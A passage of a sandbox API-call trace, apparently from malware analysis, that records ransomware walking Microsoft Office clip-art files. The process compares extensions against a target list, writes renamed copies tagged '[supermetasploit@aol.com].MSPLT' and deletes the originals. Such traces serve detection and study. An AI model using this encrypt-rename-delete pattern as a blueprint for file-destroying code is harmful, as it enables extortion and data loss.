Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.022] lstrlenW (lpString=".dbf") returned 4 [0315.022] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.022] lstrlenW (lpString=".1cd") returned 4 [0315.022] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.023] lstrlenW (lpString=".jpg") returned 4 [0315.023] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.023] lstrlenW (lpString=".doc") returned 4 [0315.023] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.023] lstrlenW (lpString=".docx") returned 5 [0315.023] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0315.023] lstrlenW (lpString=".pdf") returned 4 [0315.023] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.023] lstrlenW (lpString=".xls") returned 4 [0315.023] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.023] lstrlenW (lpString=".xlsx") returned 5 [0315.023] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0315.023] lstrlenW (lpString=".ppt") returned 4 [0315.023] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.023] lstrlenW (lpString=".zip") returned 4 [0315.023] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.023] lstrlenW (lpString=".rar") returned 4 [0315.023] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.024] lstrlenW (lpString=".bz2") returned 4 [0315.024] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.024] lstrlenW (lpString=".7z") returned 3 [0315.024] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.024] lstrlenW (lpString=".dbf") returned 4 [0315.024] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.024] lstrlenW (lpString=".1cd") returned 4 [0315.024] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0315.024] lstrlenW (lpString=".jpg") returned 4 [0315.024] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.024] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0315.024] lstrlenW (lpString="CLASSIC2.WMF") returned 12 [0315.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.158] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=2262) returned 1 [0315.159] CloseHandle (hObject=0x530) returned 1 [0315.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf")) returned 0x220 [0315.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.393] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.393] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0315.394] GetLastError () returned 0x0 [0315.394] ReadFile (in: hFile=0x530, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x8d6, lpOverlapped=0x0) returned 1 [0315.396] WriteFile (in: hFile=0x470, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x8e0, lpOverlapped=0x0) returned 1 [0315.397] ReadFile (in: hFile=0x530, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0315.397] WriteFile (in: hFile=0x470, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0315.397] SetEndOfFile (hFile=0x470) returned 1 [0315.398] CloseHandle (hObject=0x470) returned 1 [0315.398] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.398] SetEndOfFile (hFile=0x530) returned 1 [0315.417] CloseHandle (hObject=0x530) returned 1 [0315.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0315.418] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf")) returned 1 [0315.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.419] lstrlenW (lpString=".doc") returned 4 [0315.419] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.420] lstrlenW (lpString=".docx") returned 5 [0315.420] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0315.420] lstrlenW (lpString=".pdf") returned 4 [0315.420] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.420] lstrlenW (lpString=".xls") returned 4 [0315.420] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.420] lstrlenW (lpString=".xlsx") returned 5 [0315.420] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0315.420] lstrlenW (lpString=".ppt") returned 4 [0315.420] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.420] lstrlenW (lpString=".zip") returned 4 [0315.420] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.420] lstrlenW (lpString=".rar") returned 4 [0315.420] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.420] lstrlenW (lpString=".bz2") returned 4 [0315.420] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.420] lstrlenW (lpString=".7z") returned 3 [0315.420] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.420] lstrlenW (lpString=".dbf") returned 4 [0315.420] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.420] lstrlenW (lpString=".1cd") returned 4 [0315.420] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.420] lstrlenW (lpString=".jpg") returned 4 [0315.421] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.421] lstrlenW (lpString=".doc") returned 4 [0315.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.421] lstrlenW (lpString=".docx") returned 5 [0315.421] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0315.421] lstrlenW (lpString=".pdf") returned 4 [0315.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.421] lstrlenW (lpString=".xls") returned 4 [0315.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.421] lstrlenW (lpString=".xlsx") returned 5 [0315.421] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0315.421] lstrlenW (lpString=".ppt") returned 4 [0315.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.421] lstrlenW (lpString=".zip") returned 4 [0315.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.421] lstrlenW (lpString=".rar") returned 4 [0315.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.421] lstrlenW (lpString=".bz2") returned 4 [0315.421] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.421] lstrlenW (lpString=".7z") returned 3 [0315.421] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.421] lstrlenW (lpString=".dbf") returned 4 [0315.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.422] lstrlenW (lpString=".1cd") returned 4 [0315.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0315.422] lstrlenW (lpString=".jpg") returned 4 [0315.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.422] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0315.422] lstrlenW (lpString="CRANINST.WMF") returned 12 [0315.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.423] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=49546) returned 1 [0315.423] CloseHandle (hObject=0x530) returned 1 [0315.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf")) returned 0x220 [0315.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.424] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.424] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0315.425] GetLastError () returned 0x0 [0315.425] ReadFile (in: hFile=0x530, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xc18a, lpOverlapped=0x0) returned 1 [0315.518] WriteFile (in: hFile=0x470, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xc190, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xc190, lpOverlapped=0x0) returned 1 [0315.521] ReadFile (in: hFile=0x530, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0315.521] WriteFile (in: hFile=0x470, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0315.522] SetEndOfFile (hFile=0x470) returned 1 [0315.522] CloseHandle (hObject=0x470) returned 1 [0315.522] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.522] SetEndOfFile (hFile=0x530) returned 1 [0315.527] CloseHandle (hObject=0x530) returned 1 [0315.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0316.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf")) returned 1 [0317.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.011] lstrlenW (lpString=".doc") returned 4 [0317.011] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.011] lstrlenW (lpString=".docx") returned 5 [0317.011] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0317.011] lstrlenW (lpString=".pdf") returned 4 [0317.011] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.011] lstrlenW (lpString=".xls") returned 4 [0317.011] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.011] lstrlenW (lpString=".xlsx") returned 5 [0317.011] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0317.011] lstrlenW (lpString=".ppt") returned 4 [0317.011] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.011] lstrlenW (lpString=".zip") returned 4 [0317.011] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.011] lstrlenW (lpString=".rar") returned 4 [0317.011] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.011] lstrlenW (lpString=".bz2") returned 4 [0317.011] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.012] lstrlenW (lpString=".7z") returned 3 [0317.012] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.012] lstrlenW (lpString=".dbf") returned 4 [0317.012] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.012] lstrlenW (lpString=".1cd") returned 4 [0317.012] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.012] lstrlenW (lpString=".jpg") returned 4 [0317.012] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.012] lstrlenW (lpString=".doc") returned 4 [0317.012] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.012] lstrlenW (lpString=".docx") returned 5 [0317.012] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0317.012] lstrlenW (lpString=".pdf") returned 4 [0317.012] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.012] lstrlenW (lpString=".xls") returned 4 [0317.012] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.012] lstrlenW (lpString=".xlsx") returned 5 [0317.012] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0317.012] lstrlenW (lpString=".ppt") returned 4 [0317.012] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.012] lstrlenW (lpString=".zip") returned 4 [0317.012] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.013] lstrlenW (lpString=".rar") returned 4 [0317.013] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.013] lstrlenW (lpString=".bz2") returned 4 [0317.013] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.013] lstrlenW (lpString=".7z") returned 3 [0317.013] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.013] lstrlenW (lpString=".dbf") returned 4 [0317.013] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.013] lstrlenW (lpString=".1cd") returned 4 [0317.013] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0317.013] lstrlenW (lpString=".jpg") returned 4 [0317.013] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.013] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0317.013] lstrlenW (lpString="CUPINST.WMF") returned 11 [0317.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0317.178] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=10326) returned 1 [0317.178] CloseHandle (hObject=0x530) returned 1 [0317.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf")) returned 0x220 [0317.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0317.180] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0317.180] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0317.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0317.181] GetLastError () returned 0x0 [0317.181] ReadFile (in: hFile=0x530, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x2856, lpOverlapped=0x0) returned 1 [0317.184] WriteFile (in: hFile=0x3e4, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x2860, lpOverlapped=0x0) returned 1 [0317.185] ReadFile (in: hFile=0x530, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0317.185] WriteFile (in: hFile=0x3e4, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xea, lpOverlapped=0x0) returned 1 [0317.186] SetEndOfFile (hFile=0x3e4) returned 1 [0317.186] CloseHandle (hObject=0x3e4) returned 1 [0317.186] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0317.186] SetEndOfFile (hFile=0x530) returned 1 [0317.190] CloseHandle (hObject=0x530) returned 1 [0317.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0317.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf")) returned 1 [0317.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.192] lstrlenW (lpString=".doc") returned 4 [0317.192] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.192] lstrlenW (lpString=".docx") returned 5 [0317.192] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0317.192] lstrlenW (lpString=".pdf") returned 4 [0317.192] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.192] lstrlenW (lpString=".xls") returned 4 [0317.192] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.192] lstrlenW (lpString=".xlsx") returned 5 [0317.192] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0317.192] lstrlenW (lpString=".ppt") returned 4 [0317.192] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.193] lstrlenW (lpString=".zip") returned 4 [0317.193] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.193] lstrlenW (lpString=".rar") returned 4 [0317.193] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.193] lstrlenW (lpString=".bz2") returned 4 [0317.193] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.193] lstrlenW (lpString=".7z") returned 3 [0317.193] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.193] lstrlenW (lpString=".dbf") returned 4 [0317.193] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.193] lstrlenW (lpString="C:\\Program Files\\Microsoft 